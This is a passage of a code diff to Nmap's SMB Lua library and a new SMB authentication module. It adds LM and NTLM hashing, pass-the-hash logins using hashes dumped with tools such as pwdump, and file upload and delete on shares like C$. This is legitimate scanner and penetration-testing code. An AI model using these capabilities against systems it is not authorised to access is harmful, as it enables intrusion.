+			end -- Should we parse the parameters/data?
+		until status_name ~= "NT_STATUS_MORE_PROCESSING_REQUIRED"
+
+		-- Display a message to the user, and try the next account
+		if(log_errors == nil or log_errors == true) then
+			stdnse.print_debug(1, "SMB: Extended login as %s\\%s failed (%s)", accounts[i]['domain'], string_or_blank(accounts[i]['username']), status_name)
+		end
+
+		-- Reset the user id and security_blob
+		smb['uid'] = 0
+
+	end -- Loop over the accounts
+	
+	if(log_errors == nil or log_errors == true) then
+		stdnse.print_debug(1, "SMB: ERROR: All logins failed, sorry it didn't work out!")
+	end
+
+	return false, status_name
+end
+
+--- Sends out SMB_COM_SESSION_SETUP_ANDX, which attempts to log a user in. 
+-- Sends the following:
+-- * Negotiated parameters (multiplexed connections, virtual circuit, capabilities)
+-- * Passwords (plaintext, unicode, lanman, ntlm, lmv2, ntlmv2, etc)
+-- * Account name
+-- * OS (I just send "Nmap")
+-- * Native LAN Manager (no clue what that is, but it seems to be ignored)
+--
+-- Receives the following:
+-- * User ID
+-- * Server OS
+--
+--@param smb          The SMB object associated with the connection
+--@param username     [optional] Overrides the account name to use. Will use Nmap parameters or registry by 
+--                    default, or NULL session if it isn't set anywhere
+--@param domain       [optional] Overrides the domain to use. 
+--@param password     [optional] Overrides the password to use. Will use Nmap parameters or registry by default.
+--@param hash_type    [optional] Overrides the hash type to use (can be v1, LM, NTLM, LMv2, v2). Default is 'NTLM'.
+--@param use_defaults  [optional] If set, will attempt anonymous/guest. Default: true.
+--@param log_errors   [optional] If set, will display login. Default: true. 
+--@return (status, result) If status is false, result is an error message. Otherwise, result is nil and the following
+--        elements are added to the smb table:
+--    *  'uid'         The UserID for the session
+--    *  'is_guest'    If set, the username wasn't found so the user was automatically logged in as the guest account
+--    *  'os'          The operating system
+--    *  'lanmanager'  The servers's LAN Manager
+function start_session(smb, username, domain, password, password_hash, hash_type, use_defaults, log_errors)
+	local overrides = { username=username, domain=domain, password=password, password_hash=password_hash, hash_type=hash_type }
+
+	if(smb['extended_security'] == true) then
+		return start_session_extended(smb, overrides, use_defaults, log_errors)
+	else
+		return start_session_basic(smb, overrides, use_defaults, log_errors)
+	end
 end
  
 --- Sends out <code>SMB_COM_SESSION_TREE_CONNECT_ANDX</code>, which attempts to connect to a share. 
@@ -1547,6 +1476,10 @@ function tree_connect(smb, path)
 		return false, get_status_name(status)
 	end
 
+	if(tid == 0 or tonumber(tid) == 0) then
+		return false, "SMB: ERROR: Server didn't establish a proper tree connection (likely an embedded system)"
+	end
+
 	smb['tid'] = tid
 
 	return true
@@ -1622,17 +1555,25 @@ function logoff(smb)
 		return false, header
 	end
 
+	-- Reset session variables (note: this has to come after the smb_read(), otherwise the message signatures cause a problem
+	smb['uid']      = 0
+	smb['sequence'] = -1
+	smb['mac_key']  = nil
+
 	-- Check if there was an error
 	pos, header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid = bin.unpack("<CCCCCICSSlSSSSS", header)
 	if(mid == nil) then
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [22]"
 	end
+
+	if(status == 0xc0000022) then
+		stdnse.print_debug(1, "SMB: ERROR: Access was denied in 'logoff', indicating a problem with your message signatures")
+		return false, "SMB: ERROR: Access was denied in 'logoff', indicating a problem with your message signatures"
+	end
 	if(status ~= 0) then
 		return false, get_status_name(status)
 	end
 
-	smb['uid'] = 0
-
 	return true
 	
 end
@@ -1664,11 +1605,11 @@ function create_file(smb, path)
 					0x02000000,       -- Access mask
 					0x0000000000000000, -- Allocation size
 					0x00000000,         -- File attributes
-					0x00000003,         -- Share attributes
-					0x00000001,         -- Disposition
+					0x00000007,         -- Share attributes
+					0x00000000,         -- Disposition
 					0x00000000,         -- Create options
 					0x00000002,         -- Impersonation
-					0x00                -- Security flags
+					0x01                -- Security flags
 				)
 
 	data = bin.pack("z", path)
@@ -1681,7 +1622,7 @@ function create_file(smb, path)
 	end
 
 	-- Read the result
-	status, header, parameters, data = smb_read(smb)
+	status, header, parameters, data = smb_read(smb, false)
 	if(status ~= true) then
 		return false, header
 	end
@@ -1701,7 +1642,7 @@ function create_file(smb, path)
 		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [24]"
 	end
 
-	-- Fill in the smb string
+	-- Fill in the smb table
 	smb['oplock_level']    = oplock_level
 	smb['fid']             = fid
 	smb['create_action']   = create_action
@@ -1872,8 +1813,96 @@ function write_file(smb, write_data, offset)
 	return true, response
 end
 
+--- This sends a SMB request to close a file (or a pipe). 
+--
+--@param smb        The SMB object associated with the connection
+--@return (status, result) If status is false, result is an error message. Otherwise, result is undefined. 
+function close_file(smb)
+	local header, parameters, data
+	local pos
+	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, pid, mid 
+	local andx_command, andx_reserved, andx_offset
+	local response = {}
 
+	header = smb_encode_header(smb, command_codes['SMB_COM_CLOSE'])
+	parameters = bin.pack("<SI",
+					smb['fid'], -- FID
+					0xFFFFFFFF  -- Last write (unspecified)
+				)
 
+	data = ""
+
+	-- Send the close file
+	stdnse.print_debug(2, "SMB: Sending SMB_CLOSE")
+	result, err = smb_send(smb, header, parameters, data)
+	if(result == false) then
+		return false, err
+	end
+
+	-- Read the result
+	status, header, parameters, data = smb_read(smb)
+	if(status ~= true) then
+		return false, header
+	end
+
+	-- Check if the close was successful
+	pos, header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid = bin.unpack("<CCCCCICSSlSSSSS", header)
+	if(mid == nil) then
+		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [27]"
+	end
+	if(status ~= 0) then
+		return false, get_status_name(status)
+	end
+
+	-- Close response has no parameters or data
+	return true, response
+end
+
+--- This sends a SMB request to delete a file (or a pipe). 
+--
+--@param smb    The SMB object associated with the connection
+--@param path   The path of the file to delete
+--@return (status, result) If status is false, result is an error message. Otherwise, result is undefined. 
+function delete_file(smb, path)
+	local header, parameters, data
+	local pos
+	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, pid, mid 
+	local andx_command, andx_reserved, andx_offset
+
+	header = smb_encode_header(smb, command_codes['SMB_COM_DELETE'])
+	parameters = bin.pack("<S",
+					0x0000 -- Search attributes
+				)
+
+	data = bin.pack("<Cz", 
+					0x04, -- Ascii formatted filename
+					path)
+
+	-- Send the close file
+	stdnse.print_debug(2, "SMB: Sending SMB_CLOSE")
+	result, err = smb_send(smb, header, parameters, data)
+	if(result == false) then
+		return false, err
+	end
+
+	-- Read the result
+	status, header, parameters, data = smb_read(smb)
+	if(status ~= true) then
+		return false, header
+	end
+
+	-- Check if the close was successful
+	pos, header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid = bin.unpack("<CCCCCICSSlSSSSS", header)
+	if(mid == nil) then
+		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [27]"
+	end
+	if(status ~= 0) then
+		return false, get_status_name(status)
+	end
+
+	-- Close response has no parameters or data
+	return true
+end
 
 ---This is the core of making MSRPC calls. It sends out a MSRPC packet with the given parameters and data. 
 -- Don't confuse these parameters and data with SMB's concepts of parameters and data -- they are completely
@@ -1883,25 +1912,29 @@ end
 -- MSRPC call, make the call, then unwrap the SMB stuff from it before returning. 
 --
 --@param smb    The SMB object associated with the connection
---@param func   The function to call. The only one I've tested is 0x26, named pipes. 
 --@param function_parameters The parameter data to pass to the function. This is untested, since none of the
 --       transactions I've done have required parameters. 
 --@param function_data   The data to send with the packet. This is basically the next protocol layer
+--@param pipe [optional] The pipe to transact on. Default: "\PIPE\". 
 --@return (status, result) If status is false, result is an error message. Otherwise, result is a table 
 --        containing 'parameters' and 'data', representing the parameters and data returned by the server. 
-function send_transaction(smb, func, function_parameters, function_data)
+function send_transaction_named_pipe(smb, function_parameters, function_data, pipe)
 	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, pid, mid 
 	local header, parameters, data
 	local parameters_offset, data_offset
 	local total_word_count, total_data_count, reserved1, parameter_count, parameter_offset, parameter_displacement, data_count, data_offset, data_displacement, setup_count, reserved2
 	local response = {}
 
+	if(pipe == nil) then
+		pipe = "\\PIPE\\"
+	end
+
 	-- Header is 0x20 bytes long (not counting NetBIOS header).
 	header = smb_encode_header(smb, command_codes['SMB_COM_TRANSACTION']) -- 0x25 = SMB_COM_TRANSACTION
 
 	-- 0x20 for SMB header, 0x01 for parameters header, 0x20 for parameters length, 0x02 for data header, 0x07 for "\PIPE\"
-	parameters_offset = 0x20 + 0x01 + 0x20 + 0x02 + 0x07
-	data_offset       = 0x20 + 0x01 + 0x20 + 0x02 + 0x07 + string.len(function_parameters)
+	parameters_offset = 0x20 + 0x01 + 0x20 + 0x02 + (#pipe + 1)
+	data_offset       = 0x20 + 0x01 + 0x20 + 0x02 + (#pipe + 1) + string.len(function_parameters)
 
 	-- Parameters are 0x20 bytes long. 
 	parameters = bin.pack("<SSSSCCSISSSSSCCSS",
@@ -1920,12 +1953,12 @@ function send_transaction(smb, func, function_parameters, function_data)
 					data_offset,                     -- Data offset.
 					0x02,                            -- Number of 'setup' words (only ever seen '2').
 					0x00,                            -- Reserved.
-					func,                            -- Function to call.
+					0x0026,                          -- Function to call.
 					smb['fid']                       -- Handle to open file
 				)
 
 	-- \PIPE\ is 0x07 bytes long. 
-	data = bin.pack("<z", "\\PIPE\\");
+	data = bin.pack("<z", pipe);
 	data = data .. function_parameters;
 	data = data .. function_data
 
@@ -1977,9 +2010,207 @@ function send_transaction(smb, func, function_parameters, function_data)
 	return true, response
 end
 
+function send_transaction_waitnamedpipe(smb, priority, pipe)
+	local header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, pid, mid 
+	local header, parameters, data
+	local parameters_offset, data_offset
+	local total_word_count, total_data_count, reserved1, parameter_count, parameter_offset, parameter_displacement, data_count, data_offset, data_displacement, setup_count, reserved2
+	local response = {}
+	local padding = ""
 
+	-- Header is 0x20 bytes long (not counting NetBIOS header).
+	header = smb_encode_header(smb, command_codes['SMB_COM_TRANSACTION']) -- 0x25 = SMB_COM_TRANSACTION
 
+	-- Parameters are 0x20 bytes long. 
+	parameters = bin.pack("<SSSSCCSISSSSSCCSS",
+					0,                               -- Total parameter count. 
+					0,                               -- Total data count. 
+					0x000,                           -- Max parameter count.
+					0x400,                           -- Max data count.
+					0x00,                            -- Max setup count.
+					0x00,                            -- Reserved.
+					0x0000,                          -- Flags (0x0000 = 2-way transaction, don't disconnect TIDs).
+					30,                              -- Timeout (0x00000000 = return immediately).
+					0x0000,                          -- Reserved.
+					0,                               -- Parameter bytes.
+					0,                               -- Parameter offset.
+					0,                               -- Data bytes.
+					0,                               -- Data offset.
+					0x02,                            -- Number of 'setup' words (only ever seen '2').
+					0x00,                            -- Reserved.
+					0x0053,                          -- Function to call.
+					priority                         -- Handle to open file
+				)
 
+	while(((#pipe + 1 + #padding) % 4) ~= 0) do
+		padding = padding .. string.char(0)
+	end
+	data = bin.pack("<zA", pipe, padding);
+
+	-- Send the transaction request
+	stdnse.print_debug(2, "SMB: Sending SMB_COM_TRANSACTION (WaitNamedPipe)")
+	result, err = smb_send(smb, header, parameters, data)
+	if(result == false) then
+		return false, err
+	end
+
+	-- Read the result
+	status, header, parameters, data = smb_read(smb)
+	if(status ~= true) then
+		return false, header
+	end
+
+	-- Check if it worked
+	pos, header1, header2, header3, header4, command, status, flags, flags2, pid_high, signature, unused, tid, pid, uid, mid = bin.unpack("<CCCCCICSSlSSSSS", header)
+	if(mid == nil) then
+		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [31]"
+	end
+	if(status ~= 0) then
+		if(status_names[status] == nil) then
+			return false, string.format("Unknown SMB error: 0x%08x\n", status)
+		else
+			return false, status_names[status]
+		end
+	end
+
+	-- Parse the parameters
+	pos, total_word_count, total_data_count, reserved1, parameter_count, parameter_offset, parameter_displacement, data_count, data_offset, data_displacement, setup_count, reserved2 = bin.unpack("<SSSSSSSSSCC", parameters)
+	if(reserved2 == nil) then
+		return false, "SMB: ERROR: Ran off the end of SMB packet; likely due to server truncation [32]"
+	end
+
+	-- TODO: Do I actually need anything from here?
+
+	return true, response
+end
+
+---Upload a file from the local machine to the remote machine, on the given share. 
+-- 
+--@param host       The host object
+--@param localfile  The file on the local machine, relative to the nmap path
+--@param share      The share to upload it to (eg, C$). 
+--@param remotefile The remote file on the machine. It is relative to the share's root. 
+function file_upload(host, localfile, share, remotefile)
+	local status, smbstate
+	local chunk = 1024
+
+	local filename = nmap.fetchfile(localfile)
+	if(filename == nil) then
+		return false, "Couldn't find the file"
+	end
+
+	-- Create the SMB session
+	status, smbstate = smb.start_ex(host, true, true, share, remotefile)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	local handle = io.open(filename, "r")
+	local data = handle:read(chunk)
+
+	local i = 0
+	while(data ~= nil and #data > 0) do
+	
+		status, err = smb.write_file(smbstate, data, i)
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, err
+		end
+
+		data = handle:read(chunk)
+		i = i + chunk
+	end
+	
+	handle:close()
+	status, err = smb.close_file(smbstate)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, err
+	end
+
+	-- Stop the session
+	smb.stop(smbstate)
+
+	return true
+end
+
+---Delete a file from the remote machine
+-- 
+--@param host       The host object
+--@param share      The share to upload it to (eg, C$). 
+--@param remotefile The remote file on the machine. It is relative to the share's root. 
+--@return (status, err) If status is false, err is an error message. Otherwise, err is undefined. 
+function file_delete(host, share, remotefile)
+	local status, smbstate, err
+
+	-- Create the SMB session
+	status, smbstate = smb.start_ex(host, true, true, share)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	status, err = smb.delete_file(smbstate, remotefile)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, err
+	end
+
+	-- Stop the session
+	smb.stop(smbstate)
+
+	return true
+end
+
+--- Converts numbered Windows version strings (<code>"Windows 5.0"</code>, <code>"Windows 5.1"</code>) to names (<code>"Windows 2000"</code>, <code>"Windows XP"</code>). 
+--@param os The numbered OS version.
+--@return The actual name of the OS (or the same as the <code>os</code> parameter if no match was found).
+function get_windows_version(os)
+
+	if(os == "Windows 5.0") then
+		return "Windows 2000"
+	elseif(os == "Windows 5.1")then
+		return "Windows XP"
+	end
+
+	return os
+
+end
+
+---Retrieve information about the host's operating system. This should always be possible to call, as long as there isn't already
+-- a SMB session established. 
+--
+--@param host The host object
+--@return (status, data) If status is true, data is a table of values; otherwise, data is an error message. 
+function get_os(host)
+    local state
+    local status, smbstate
+
+	local response = {}
+
+    -- Start up SMB
+    status, smbstate = smb.start_ex(host, true, true, nil, nil, true)
+    if(status == false) then
+		return false, smbstate
+    end
+
+	-- See if we actually got something
+    if(smbstate['os'] == nil and smbstate['lanmanager'] == nil) then
+		return false, "Server didn't return OS details"
+	end
+
+	-- Convert blank values to something useful
+	response['os']           = string_or_blank(smbstate['os'],           "Unknown")
+	response['lanmanager']   = string_or_blank(smbstate['lanmanager'],   "Unknown")
+	response['domain']       = string_or_blank(smbstate['domain'],       "Unknown")
+	response['server']       = string_or_blank(smbstate['server'],       "Unknown")
+	response['date']         = string_or_blank(smbstate['date'],         "Unknown")
+	response['timezone_str'] = string_or_blank(smbstate['timezone_str'], "Unknown")
+
+    -- Kill SMB
+    smb.stop(smbstate)
+
+	return true, response
+end
 
 command_codes = 
 {
@@ -2067,20 +2298,48 @@ end
 status_codes = 
 {
 	NT_STATUS_OK = 0x0000,
-	NT_STATUS_WERR_BADFILE           = 0x00000002,
-	NT_STATUS_WERR_ACCESS_DENIED     = 0x00000005,
-	NT_STATUS_WERR_INVALID_NAME      = 0x0000007b,
-	NT_STATUS_WERR_UNKNOWN_LEVEL     = 0x0000007c,
-	NT_STATUS_WERR_MORE_DATA         = 0x000000ea,
-	NT_STATUS_NO_MORE_ITEMS          = 0x00000103,
-	NT_STATUS_MORE_ENTRIES           = 0x00000105,
-	NT_STATUS_SOME_NOT_MAPPED        = 0x00000107,
-	DOS_STATUS_UNKNOWN_ERROR         = 0x00010001,
-	DOS_STATUS_NONSPECIFIC_ERROR     = 0x00010002,
-	DOS_STATUS_DIRECTORY_NOT_FOUND   = 0x00030001,
-	DOS_STATUS_ACCESS_DENIED         = 0x00050001,
-	DOS_STATUS_INVALID_FID           = 0x00060001,
-	DOS_STATUS_INVALID_NETWORK_NAME  = 0x00060002,
+	NT_STATUS_WERR_BADFILE                      = 0x00000002,
+	NT_STATUS_WERR_ACCESS_DENIED                = 0x00000005,
+	NT_STATUS_WERR_INVALID_NAME                 = 0x0000007b,
+	NT_STATUS_WERR_UNKNOWN_LEVEL                = 0x0000007c,
+	NT_STATUS_WERR_MORE_DATA                    = 0x000000ea,
+	NT_STATUS_NO_MORE_ITEMS                     = 0x00000103,
+	NT_STATUS_MORE_ENTRIES                      = 0x00000105,
+	NT_STATUS_SOME_NOT_MAPPED                   = 0x00000107,
+	NT_STATUS_SERVICE_REQUEST_TIMEOUT           = 0x0000041D,
+	NT_STATUS_SERVICE_NO_THREAD                 = 0x0000041E,
+	NT_STATUS_SERVICE_DATABASE_LOCKED           = 0x0000041F,
+	NT_STATUS_SERVICE_ALREADY_RUNNING           = 0x00000420,
+	NT_STATUS_INVALID_SERVICE_ACCOUNT           = 0x00000421,
+	NT_STATUS_SERVICE_DISABLED                  = 0x00000422,
+	NT_STATUS_CIRCULAR_DEPENDENCY               = 0x00000423,
+	NT_STATUS_SERVICE_DOES_NOT_EXIST            = 0x00000424,
+	NT_STATUS_SERVICE_CANNOT_ACCEPT_CTRL        = 0x00000425,
+	NT_STATUS_SERVICE_NOT_ACTIVE                = 0x00000426,
+	NT_STATUS_FAILED_SERVICE_CONTROLLER_CONNECT = 0x00000427,
+	NT_STATUS_EXCEPTION_IN_SERVICE              = 0x00000428,
+	NT_STATUS_DATABASE_DOES_NOT_EXIST           = 0x00000429,
+	NT_STATUS_SERVICE_SPECIFIC_ERROR            = 0x0000042a,
+	NT_STATUS_PROCESS_ABORTED                   = 0x0000042b,
+	NT_STATUS_SERVICE_DEPENDENCY_FAIL           = 0x0000042c,
+	NT_STATUS_SERVICE_LOGON_FAILED              = 0x0000042d,
+	NT_STATUS_SERVICE_START_HANG                = 0x0000042e,
+	NT_STATUS_INVALID_SERVICE_LOCK              = 0x0000042f,
+	NT_STATUS_SERVICE_MARKED_FOR_DELETE         = 0x00000430,
+	NT_STATUS_SERVICE_EXISTS                    = 0x00000431,
+	NT_STATUS_ALREADY_RUNNING_LKG               = 0x00000432,
+	NT_STATUS_SERVICE_DEPENDENCY_DELETED        = 0x00000433,
+	NT_STATUS_BOOT_ALREADY_ACCEPTED             = 0x00000434,
+	NT_STATUS_SERVICE_NEVER_STARTED             = 0x00000435,
+	NT_STATUS_DUPLICATE_SERVICE_NAME            = 0x00000436,
+	NT_STATUS_DIFFERENT_SERVICE_ACCOUNT         = 0x00000437,
+	NT_STATUS_CANNOT_DETECT_DRIVER_FAILURE      = 0x00000438,
+	DOS_STATUS_UNKNOWN_ERROR                    = 0x00010001,
+	DOS_STATUS_NONSPECIFIC_ERROR                = 0x00010002,
+	DOS_STATUS_DIRECTORY_NOT_FOUND              = 0x00030001,
+	DOS_STATUS_ACCESS_DENIED                    = 0x00050001,
+	DOS_STATUS_INVALID_FID                      = 0x00060001,
+	DOS_STATUS_INVALID_NETWORK_NAME             = 0x00060002,
 	NT_STATUS_BUFFER_OVERFLOW = 0x80000005,
 	NT_STATUS_UNSUCCESSFUL = 0xc0000001,
 	NT_STATUS_NOT_IMPLEMENTED = 0xc0000002,
diff --git a/nselib/smbauth.lua b/nselib/smbauth.lua
new file mode 100644
index 000000000..537c1376d
--- /dev/null
+++ b/nselib/smbauth.lua
@@ -0,0 +1,659 @@
+---This module takes care of the authentication used in SMB (LM, NTLM, LMv2, NTLMv2). 
+-- There is a lot to this functionality, so if you're interested in how it works, read
+-- on. 
+--
+-- In SMB authentication, there are two distinct concepts. Each will be dealt with
+-- separately. There are:
+-- * Stored hashes
+-- * Authentication
+--
+-- What's confusing is that the same names are used for each of those. 
+--
+-- Stored Hashes
+-- Windows stores two types of hashes: Lanman and NT Lanman (or NTLM). Vista and later
+-- store NTLM only. Lanman passwords are divided into two 7-character passwords and 
+-- used as a key in DES, while NTLM is converted to unicode and MD4ed. 
+--
+-- The stored hashes can be dumped in a variety of ways (pwdump6, fgdump, metasploit's
+-- priv module, smb-pwdump.nse, etc). Generally, two hashes are dumped together 
+-- (generally, Lanman:NTLM). Sometimes, Lanman is empty and only NTLM is given. Lanman
+-- is never required. 
+--
+-- The password hashes can be given instead of passwords when supplying credentials; 
+-- this is done by using the <code>smbhash</code> argument. Either a pair of hashes
+-- can be passed, in the form of Lanman:NTLM, or a single hash, which is assumed to
+-- be NTLM. 
+--
+-- Authentication
+-- There are four types of authentication. Confusingly, these have the same names as
+-- stored hashes, but only slight relationships. The four types are Lanmanv1, NTLMv1, 
+-- Lanmanv2, and NTLMv2. By default, Lanmanv1 and NTLMv1 are used together in most 
+-- applications. These Nmap scripts default to NTLMv1 alone, except in special cases, 
+-- but it can be overridden by the user. 
+--
+-- Lanmanv1 and NTLMv1 both use DES for their response. The DES mixes a server challenge
+-- with the hash (Lanman hash for Lanmanv1 response and NTLMv1 hash for NTLM response). 
+-- The way the challenge is DESed with the hashes is identical for Lanmanv1 and NTLMv1, 
+-- the only difference is the starting hash (Lanman vs NTLM). 
+--
+-- Lanmanv2 and NTLMv2 both use HMAC-MD5 for their response. The HMAC-MD5 mixes a 
+-- server challenge and a client challenge with the NTLM hash, in both cases. The 
+-- difference between Lanmanv2 and NTLMv2 is the length of the client challenge;
+-- Lanmanv2 has a maximum client challenge of 8 bytes, whereas NTLMv2 doesn't limit
+-- the length of the client challenge. 
+--
+-- The primary advantage to the 'v2' protocols is the client challenge -- by 
+-- incorporating a client challenge, a malicious server can't use a precomputation
+-- attack. 
+--
+-- In addition to hashing the passwords, messages are also signed, by default, if a 
+-- v1 protocol is being used (I (Ron Bowes) couldn't get signatures to work on v2 
+-- protocols; if anybody knows how I'd love to implement it).
+--
+--@args  smbusername The SMB username to log in with. The forms "DOMAIN\username" and "username@DOMAIN"
+--                   are not understood. To set a domain, use the <code>smbdomain</code> argument.
+--@args  smbdomain   The domain to log in with. If you aren't in a domained environment, then anything
+--                   will (should?) be accepted by the server.
+--@args  smbpassword The password to connect with. Be cautious with this, since some servers will lock
+--                   accounts if the incorrect password is given. Although it's rare that the
+--                   Administrator account can be locked out, in the off chance that it can, you could
+--                   get yourself in trouble. To use a blank password, leave this parameter off
+--                   altogether. 
+--@args  smbhash     A password hash to use when logging in. This is given as a single hex string (32
+--                   characters) or a pair of hex strings (both 32 characters, optionally separated by a
+--                   single character). These hashes are the LanMan or NTLM hash of the user's password,
+--                   and are stored on disk or in memory. They can be retrieved from memory
+--                   using the fgdump or pwdump tools.
+--@args  smbtype     The type of SMB authentication to use. These are the possible options:
+-- * <code>v1</code>:     Sends LMv1 and NTLMv1.
+-- * <code>LMv1</code>:   Sends LMv1 only.
+-- * <code>NTLMv1</code>: Sends NTLMv1 only (default).
+-- * <code>v2</code>:     Sends LMv2 and NTLMv2.
+-- * <code>LMv2</code>:   Sends LMv2 only.
+-- * <code>NTLMv2</code>: Doesn't exist; the protocol doesn't support NTLMv2 alone. 
+--                   The default, <code>NTLMv1</code>, is a pretty decent compromise between security and 
+--                   compatibility. If you are paranoid, you might want to use <code>v2</code> or 
+--                   <code>lmv2</code> for this. (Actually, if you're paranoid, you should be avoiding this 
+--                   protocol altogether!). If you're using an extremely old system, you might need to set 
+--                   this to <code>v1</code> or <code>lm</code>, which are less secure but more compatible.  
+--                   For information, see <code>smbauth.lua</code>. 
+
+module(... or "smbauth", package.seeall)
+
+require 'bit'
+require 'bin'
+require 'netbios'
+require 'stdnse'
+
+require 'nsedebug'
+
+have_ssl = (nmap.have_ssl() and pcall(require, "openssl"))
+
+-- Constants
+local NTLMSSP_NEGOTIATE = 0x00000001
+local NTLMSSP_CHALLENGE = 0x00000002
+local NTLMSSP_AUTH      = 0x00000003
+
+local function to_unicode(str)
+	local unicode = ""
+
+	for i = 1, #str, 1 do
+		unicode = unicode .. bin.pack("<S", string.byte(str, i))
+	end
+
+	return unicode
+end
+
+---Generate the Lanman v1 hash (LMv1). The generated hash is incredibly easy to reverse, because the input
+-- is padded or truncated to 14 characters, then split into two 7-character strings. Each of these strings
+-- are used as a key to encrypt the string, "KGS!@#$%" in DES. Because the keys are no longer than 
+-- 7-characters long, it's pretty trivial to bruteforce them. 
+--
+--@param password the password to hash
+--@return (status, hash) If status is true, the hash is returned; otherwise, an error message is returned.
+local function lm_create_hash(password)
+	if(have_ssl ~= true) then
+		return false, "SMB: OpenSSL not present"
+	end
+
+	local str1, str2
+	local key1, key2
+	local result
+
+	-- Convert the password to uppercase
+	password = string.upper(password)
+
+	-- If password is under 14 characters, pad it to 14
+	if(#password < 14) then
+		password = password .. string.rep(string.char(0), 14 - #password)
+	end
+
+	-- Take the first and second half of the password (note that if it's longer than 14 characters, it's truncated)
+	str1 = string.sub(password, 1, 7)
+	str2 = string.sub(password, 8, 14)
+
+	-- Generate the keys
+	key1 = openssl.DES_string_to_key(str1)
+	key2 = openssl.DES_string_to_key(str2)
+
+	-- Encrypt the string "KGS!@#$%" with each half, and concatenate it
+	result = openssl.encrypt("DES", key1, nil, "KGS!@#$%") .. openssl.encrypt("DES", key2, nil, "KGS!@#$%")
+
+	return true, result
+end
+
+---Generate the NTLMv1 hash. This hash is quite a bit better than LMv1, and is far easier to generate. Basically,
+-- it's the MD4 of the Unicode password. 
+--
+--@param password the password to hash
+--@return (status, hash) If status is true, the hash is returned; otherwise, an error message is returned.
+function ntlm_create_hash(password)
+	if(have_ssl ~= true) then
+		return false, "SMB: OpenSSL not present"
+	end
+
+	return true, openssl.md4(to_unicode(password))
+end
+
+---Create the Lanman response to send back to the server. To do this, the Lanman password is padded to 21 
+-- characters and split into three 7-character strings. Each of those strings is used as a key to encrypt
+-- the server challenge. The three encrypted strings are concatenated and returned. 
+--
+--@param lanman    The LMv1 hash
+--@param challenge The server's challenge. 
+--@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
+function lm_create_response(lanman, challenge)
+	if(have_ssl ~= true) then
+		return false, "SMB: OpenSSL not present"
+	end
+
+	local str1, str2, str3
+	local key1, key2, key3
+	local result
+
+	-- Pad the hash to 21 characters
+	lanman = lanman .. string.rep(string.char(0), 21 - #lanman)
+
+	-- Take the first and second half of the password (note that if it's longer than 14 characters, it's truncated)
+	str1 = string.sub(lanman, 1,  7)
+	str2 = string.sub(lanman, 8,  14)
+	str3 = string.sub(lanman, 15, 21)
+
+	-- Generate the keys
+	key1 = openssl.DES_string_to_key(str1)
+	key2 = openssl.DES_string_to_key(str2)
+	key3 = openssl.DES_string_to_key(str3)
+
+	-- Encrypt the challenge with each key
+	result = openssl.encrypt("DES", key1, nil, challenge) .. openssl.encrypt("DES", key2, nil, challenge) .. openssl.encrypt("DES", key3, nil, challenge) 
+
+	return true, result
+end
+
+---Create the NTLM response to send back to the server. This is actually done the exact same way as the Lanman hash,
+-- so I call the <code>Lanman</code> function. 
+--
+--@param ntlm      The NTLMv1 hash
+--@param challenge The server's challenge. 
+--@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
+function ntlm_create_response(ntlm, challenge)
+	return lm_create_response(ntlm, challenge)
+end
+
+---Create the NTLM mac key, which is used for message signing. For basic authentication, this is the md4 of the 
+-- NTLM hash, concatenated with the response hash; for extended authentication, this is just the md4 of the NTLM
+-- hash. 
+--@param ntlm_hash The NTLM hash. 
+--@param ntlm_response The NTLM response. 
+--@param is_extended Should be set if extended security negotiations are being used. 
+function ntlm_create_mac_key(ntlm_hash, ntlm_response, is_extended)
+	if(is_extended) then
+		return openssl.md4(ntlm_hash)
+	else
+		return openssl.md4(ntlm_hash) .. ntlm_response
+	end
+end
+
+---Create the LM mac key, which is used for message signing. For basic authentication, it's the first 8 bytes 
+-- of the lanman hash, followed by 8 null bytes, followed by the lanman response; for extended authentication, 
+-- this is just the first 8 bytes of the lanman hash followed by 8 null bytes. 
+--@param ntlm_hash The NTLM hash. 
+--@param ntlm_response The NTLM response. 
+--@param is_extended Should be set if extended security negotiations are being used. 
+function lm_create_mac_key(lm_hash, lm_response, is_extended)
+	if(is_extended) then
+		return string.sub(lm_hash, 1, 8) .. string.rep(string.char(0), 8)
+	else
+		return string.sub(lm_hash, 1, 8) .. string.rep(string.char(0), 8) .. lm_response
+	end
+end
+
+---Create the NTLMv2 hash, which is based on the NTLMv1 hash (for easy upgrading), the username, and the domain. 
+-- Essentially, the NTLM hash is used as a HMAC-MD5 key, which is used to hash the unicode domain concatenated 
+-- with the unicode username. 
+--
+--@param ntlm     The NTLMv1 hash. 
+--@param username The username we're using. 
+--@param domain   The domain. 
+--@return (status, response) If status is true, the response is returned; otherwise, an error message is returned.
+function ntlmv2_create_hash(ntlm, username, domain)
+	if(have_ssl ~= true) then
+		return false, "SMB: OpenSSL not present"
+	end
+
+	local unicode = ""
+
+	username = to_unicode(string.upper(username))
+	domain   = to_unicode(string.upper(domain))
+
+	return true, openssl.hmac("MD5", ntlm, username .. domain)
+end
+
+---Create the LMv2 response, which can be sent back to the server. This is identical to the <code>NTLMv2</code> function, 
+-- except that it uses an 8-byte client challenge. 
+--
+-- The reason for LMv2 is a long and twisted story. Well, not really. The reason is basically that the v1 hashes
+-- are always 24-bytes, and some servers expect 24 bytes, but the NTLMv2 hash is more than 24 bytes. So, the only
+-- way to keep pass-through compatibility was to have a v2-hash that was guaranteed to be 24 bytes. So LMv1 was
